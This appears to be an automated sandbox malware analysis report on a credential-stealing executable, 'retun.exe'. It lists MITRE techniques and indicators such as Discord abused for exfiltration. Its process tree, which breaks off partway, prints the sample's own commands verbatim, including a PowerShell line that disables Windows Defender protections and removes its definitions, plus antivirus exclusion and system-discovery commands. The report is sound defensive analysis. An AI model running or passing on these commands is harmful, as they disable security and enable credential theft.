2f8c8adc872d77bf4cbc46bd3f197fe9a3f71f511b3bb9e8af96f83fd7f509e6

Resubmissions

29-10-2024 22:04

241029-1yx95a1aqg 10

25-07-2024 19:49

240725-yjp9vs1bmr 10

Analysis

max time kernel
64s
max time network
67s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2024 19:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

retun.exe
Size

200.0MB
MD5

57bfb36b08a68eacecc64d77211b69b9
SHA1

db6ef4199dc49868b3bf713915057e6721c8b7e5
SHA256

2f8c8adc872d77bf4cbc46bd3f197fe9a3f71f511b3bb9e8af96f83fd7f509e6
SHA512

bcb3119f72bda2b9a247bb695154055ad74708eb444d2bd25400847fe8112da9b8210d0df94f71b4daec18776ca1948d8702f17f766234830d0a4dcf811f2f7a
SSDEEP

196608:1W++z9hoy6EnWLL0kiR+dy/YXsK0hn6ksV5:1WXRWyuPMR+dyLhO5

Score

9^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
436	powershell.exe
3800	powershell.exe
752	powershell.exe
1156	powershell.exe
4792	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023461-22.dat	acprotect
behavioral2/files/0x0002000000022ab3-29.dat	acprotect
behavioral2/files/0x000700000002345f-31.dat	acprotect
behavioral2/files/0x000700000002345a-48.dat	acprotect
behavioral2/files/0x0007000000023459-47.dat	acprotect
behavioral2/files/0x0007000000023458-46.dat	acprotect
behavioral2/files/0x0007000000023457-45.dat	acprotect
behavioral2/files/0x0007000000023456-44.dat	acprotect
behavioral2/files/0x0009000000023400-43.dat	acprotect
behavioral2/files/0x000a0000000233b5-42.dat	acprotect
behavioral2/files/0x0002000000022aaf-41.dat	acprotect
behavioral2/files/0x0007000000023466-40.dat	acprotect
behavioral2/files/0x0007000000023465-39.dat	acprotect
behavioral2/files/0x0007000000023464-38.dat	acprotect
behavioral2/files/0x0007000000023460-35.dat	acprotect
behavioral2/files/0x000700000002345e-34.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
760	cmd.exe
1228	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1372	bound.exe
3884	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
3164	retun.exe
1372	bound.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023461-22.dat	upx
behavioral2/memory/3164-26-0x0000000074A70000-0x0000000074F7B000-memory.dmp	upx
behavioral2/files/0x0002000000022ab3-29.dat	upx
behavioral2/files/0x000700000002345f-31.dat	upx
behavioral2/files/0x000700000002345a-48.dat	upx
behavioral2/memory/3164-50-0x0000000074A10000-0x0000000074A1D000-memory.dmp	upx
behavioral2/memory/3164-49-0x0000000074A20000-0x0000000074A3F000-memory.dmp	upx
behavioral2/files/0x0007000000023459-47.dat	upx
behavioral2/files/0x0007000000023458-46.dat	upx
behavioral2/files/0x0007000000023457-45.dat	upx
behavioral2/files/0x0007000000023456-44.dat	upx
behavioral2/files/0x0009000000023400-43.dat	upx
behavioral2/files/0x000a0000000233b5-42.dat	upx
behavioral2/files/0x0002000000022aaf-41.dat	upx
behavioral2/files/0x0007000000023466-40.dat	upx
behavioral2/files/0x0007000000023465-39.dat	upx
behavioral2/files/0x0007000000023464-38.dat	upx
behavioral2/files/0x0007000000023460-35.dat	upx
behavioral2/files/0x000700000002345e-34.dat	upx
behavioral2/memory/3164-56-0x00000000749E0000-0x0000000074A07000-memory.dmp	upx
behavioral2/memory/3164-58-0x00000000749C0000-0x00000000749D8000-memory.dmp	upx
behavioral2/memory/3164-60-0x00000000749A0000-0x00000000749BB000-memory.dmp	upx
behavioral2/memory/3164-62-0x0000000074860000-0x0000000074996000-memory.dmp	upx
behavioral2/memory/3164-66-0x00000000747F0000-0x00000000747FC000-memory.dmp	upx
behavioral2/memory/3164-65-0x0000000074840000-0x0000000074856000-memory.dmp	upx
behavioral2/memory/3164-73-0x00000000744C0000-0x000000007471A000-memory.dmp	upx
behavioral2/memory/3164-72-0x0000000074720000-0x00000000747B4000-memory.dmp	upx
behavioral2/memory/3164-71-0x00000000747C0000-0x00000000747E8000-memory.dmp	upx
behavioral2/memory/3164-79-0x0000000074440000-0x000000007444C000-memory.dmp	upx
behavioral2/memory/3164-78-0x0000000074450000-0x0000000074460000-memory.dmp	upx
behavioral2/memory/3164-77-0x0000000074A70000-0x0000000074F7B000-memory.dmp	upx
behavioral2/memory/3164-82-0x0000000074A20000-0x0000000074A3F000-memory.dmp	upx
behavioral2/memory/3164-83-0x0000000074310000-0x0000000074429000-memory.dmp	upx
behavioral2/memory/3164-267-0x0000000074A20000-0x0000000074A3F000-memory.dmp	upx
behavioral2/memory/3164-276-0x0000000074720000-0x00000000747B4000-memory.dmp	upx
behavioral2/memory/3164-281-0x00000000749C0000-0x00000000749D8000-memory.dmp	upx
behavioral2/memory/3164-275-0x00000000747C0000-0x00000000747E8000-memory.dmp	upx
behavioral2/memory/3164-274-0x00000000747F0000-0x00000000747FC000-memory.dmp	upx
behavioral2/memory/3164-273-0x0000000074840000-0x0000000074856000-memory.dmp	upx
behavioral2/memory/3164-271-0x00000000749A0000-0x00000000749BB000-memory.dmp	upx
behavioral2/memory/3164-266-0x0000000074A70000-0x0000000074F7B000-memory.dmp	upx
behavioral2/memory/3164-277-0x00000000744C0000-0x000000007471A000-memory.dmp	upx
behavioral2/memory/3164-363-0x0000000074860000-0x0000000074996000-memory.dmp	upx
behavioral2/memory/3164-381-0x0000000074A20000-0x0000000074A3F000-memory.dmp	upx
behavioral2/memory/3164-380-0x0000000074A70000-0x0000000074F7B000-memory.dmp	upx
behavioral2/memory/3164-402-0x0000000074A70000-0x0000000074F7B000-memory.dmp	upx
behavioral2/memory/3164-429-0x0000000074450000-0x0000000074460000-memory.dmp	upx
behavioral2/memory/3164-428-0x00000000744C0000-0x000000007471A000-memory.dmp	upx
behavioral2/memory/3164-427-0x0000000074720000-0x00000000747B4000-memory.dmp	upx
behavioral2/memory/3164-426-0x00000000747C0000-0x00000000747E8000-memory.dmp	upx
behavioral2/memory/3164-425-0x0000000074440000-0x000000007444C000-memory.dmp	upx
behavioral2/memory/3164-424-0x0000000074840000-0x0000000074856000-memory.dmp	upx
behavioral2/memory/3164-423-0x0000000074860000-0x0000000074996000-memory.dmp	upx
behavioral2/memory/3164-422-0x00000000749A0000-0x00000000749BB000-memory.dmp	upx
behavioral2/memory/3164-421-0x00000000749C0000-0x00000000749D8000-memory.dmp	upx
behavioral2/memory/3164-420-0x00000000749E0000-0x0000000074A07000-memory.dmp	upx
behavioral2/memory/3164-419-0x0000000074A10000-0x0000000074A1D000-memory.dmp	upx
behavioral2/memory/3164-418-0x0000000074A20000-0x0000000074A3F000-memory.dmp	upx
behavioral2/memory/3164-417-0x00000000747F0000-0x00000000747FC000-memory.dmp	upx
behavioral2/memory/3164-416-0x0000000074310000-0x0000000074429000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	discord.com
38	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1628	tasklist.exe
404	tasklist.exe
1372	tasklist.exe
2404	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	retun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	retun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
212	cmd.exe
4664	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4696	WMIC.exe
2480	WMIC.exe
2728	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4288	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
4792	powershell.exe
4792	powershell.exe
436	powershell.exe
436	powershell.exe
1156	powershell.exe
1156	powershell.exe
4792	powershell.exe
436	powershell.exe
1156	powershell.exe
1228	powershell.exe
1228	powershell.exe
4992	powershell.exe
4992	powershell.exe
1228	powershell.exe
4992	powershell.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeDebugPrivilege	1628	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2860	WMIC.exe
Token: SeSecurityPrivilege	2860	WMIC.exe
Token: SeTakeOwnershipPrivilege	2860	WMIC.exe
Token: SeLoadDriverPrivilege	2860	WMIC.exe
Token: SeSystemProfilePrivilege	2860	WMIC.exe
Token: SeSystemtimePrivilege	2860	WMIC.exe
Token: SeProfSingleProcessPrivilege	2860	WMIC.exe
Token: SeIncBasePriorityPrivilege	2860	WMIC.exe
Token: SeCreatePagefilePrivilege	2860	WMIC.exe
Token: SeBackupPrivilege	2860	WMIC.exe
Token: SeRestorePrivilege	2860	WMIC.exe
Token: SeShutdownPrivilege	2860	WMIC.exe
Token: SeDebugPrivilege	2860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2860	WMIC.exe
Token: SeRemoteShutdownPrivilege	2860	WMIC.exe
Token: SeUndockPrivilege	2860	WMIC.exe
Token: SeManageVolumePrivilege	2860	WMIC.exe
Token: 33	2860	WMIC.exe
Token: 34	2860	WMIC.exe
Token: 35	2860	WMIC.exe
Token: 36	2860	WMIC.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeIncreaseQuotaPrivilege	4696	WMIC.exe
Token: SeSecurityPrivilege	4696	WMIC.exe
Token: SeTakeOwnershipPrivilege	4696	WMIC.exe
Token: SeLoadDriverPrivilege	4696	WMIC.exe
Token: SeSystemProfilePrivilege	4696	WMIC.exe
Token: SeSystemtimePrivilege	4696	WMIC.exe
Token: SeProfSingleProcessPrivilege	4696	WMIC.exe
Token: SeIncBasePriorityPrivilege	4696	WMIC.exe
Token: SeCreatePagefilePrivilege	4696	WMIC.exe
Token: SeBackupPrivilege	4696	WMIC.exe
Token: SeRestorePrivilege	4696	WMIC.exe
Token: SeShutdownPrivilege	4696	WMIC.exe
Token: SeDebugPrivilege	4696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4696	WMIC.exe
Token: SeRemoteShutdownPrivilege	4696	WMIC.exe
Token: SeUndockPrivilege	4696	WMIC.exe
Token: SeManageVolumePrivilege	4696	WMIC.exe
Token: 33	4696	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4520 wrote to memory of 3164	4520	retun.exe	87
PID 4520 wrote to memory of 3164	4520	retun.exe	87
PID 4520 wrote to memory of 3164	4520	retun.exe	87
PID 3164 wrote to memory of 4544	3164	retun.exe	90
PID 3164 wrote to memory of 4544	3164	retun.exe	90
PID 3164 wrote to memory of 4544	3164	retun.exe	90
PID 3164 wrote to memory of 752	3164	retun.exe	91
PID 3164 wrote to memory of 752	3164	retun.exe	91
PID 3164 wrote to memory of 752	3164	retun.exe	91
PID 3164 wrote to memory of 4924	3164	retun.exe	92
PID 3164 wrote to memory of 4924	3164	retun.exe	92
PID 3164 wrote to memory of 4924	3164	retun.exe	92
PID 3164 wrote to memory of 2044	3164	retun.exe	93
PID 3164 wrote to memory of 2044	3164	retun.exe	93
PID 3164 wrote to memory of 2044	3164	retun.exe	93
PID 3164 wrote to memory of 3504	3164	retun.exe	96
PID 3164 wrote to memory of 3504	3164	retun.exe	96
PID 3164 wrote to memory of 3504	3164	retun.exe	96
PID 3164 wrote to memory of 4176	3164	retun.exe	100
PID 3164 wrote to memory of 4176	3164	retun.exe	100
PID 3164 wrote to memory of 4176	3164	retun.exe	100
PID 752 wrote to memory of 436	752	cmd.exe	103
PID 752 wrote to memory of 436	752	cmd.exe	103
PID 752 wrote to memory of 436	752	cmd.exe	103
PID 4176 wrote to memory of 2860	4176	cmd.exe	105
PID 4176 wrote to memory of 2860	4176	cmd.exe	105
PID 4176 wrote to memory of 2860	4176	cmd.exe	105
PID 3504 wrote to memory of 1628	3504	cmd.exe	104
PID 3504 wrote to memory of 1628	3504	cmd.exe	104
PID 3504 wrote to memory of 1628	3504	cmd.exe	104
PID 4544 wrote to memory of 1156	4544	cmd.exe	107
PID 4544 wrote to memory of 1156	4544	cmd.exe	107
PID 4544 wrote to memory of 1156	4544	cmd.exe	107
PID 4924 wrote to memory of 4792	4924	cmd.exe	106
PID 4924 wrote to memory of 4792	4924	cmd.exe	106
PID 4924 wrote to memory of 4792	4924	cmd.exe	106
PID 2044 wrote to memory of 1372	2044	cmd.exe	108
PID 2044 wrote to memory of 1372	2044	cmd.exe	108
PID 2044 wrote to memory of 1372	2044	cmd.exe	108
PID 3164 wrote to memory of 4300	3164	retun.exe	110
PID 3164 wrote to memory of 4300	3164	retun.exe	110
PID 3164 wrote to memory of 4300	3164	retun.exe	110
PID 4300 wrote to memory of 2592	4300	cmd.exe	112
PID 4300 wrote to memory of 2592	4300	cmd.exe	112
PID 4300 wrote to memory of 2592	4300	cmd.exe	112
PID 3164 wrote to memory of 2744	3164	retun.exe	113
PID 3164 wrote to memory of 2744	3164	retun.exe	113
PID 3164 wrote to memory of 2744	3164	retun.exe	113
PID 2744 wrote to memory of 3688	2744	cmd.exe	116
PID 2744 wrote to memory of 3688	2744	cmd.exe	116
PID 2744 wrote to memory of 3688	2744	cmd.exe	116
PID 3164 wrote to memory of 3192	3164	retun.exe	117
PID 3164 wrote to memory of 3192	3164	retun.exe	117
PID 3164 wrote to memory of 3192	3164	retun.exe	117
PID 3192 wrote to memory of 4696	3192	cmd.exe	119
PID 3192 wrote to memory of 4696	3192	cmd.exe	119
PID 3192 wrote to memory of 4696	3192	cmd.exe	119
PID 3164 wrote to memory of 3724	3164	retun.exe	144
PID 3164 wrote to memory of 3724	3164	retun.exe	144
PID 3164 wrote to memory of 3724	3164	retun.exe	144
PID 3724 wrote to memory of 2480	3724	cmd.exe	122
PID 3724 wrote to memory of 2480	3724	cmd.exe	122
PID 3724 wrote to memory of 2480	3724	cmd.exe	122
PID 3164 wrote to memory of 4388	3164	retun.exe	123

C:\Users\Admin\AppData\Local\Temp\retun.exe
"C:\Users\Admin\AppData\Local\Temp\retun.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4520
- C:\Users\Admin\AppData\Local\Temp\retun.exe
  "C:\Users\Admin\AppData\Local\Temp\retun.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\retun.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\retun.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
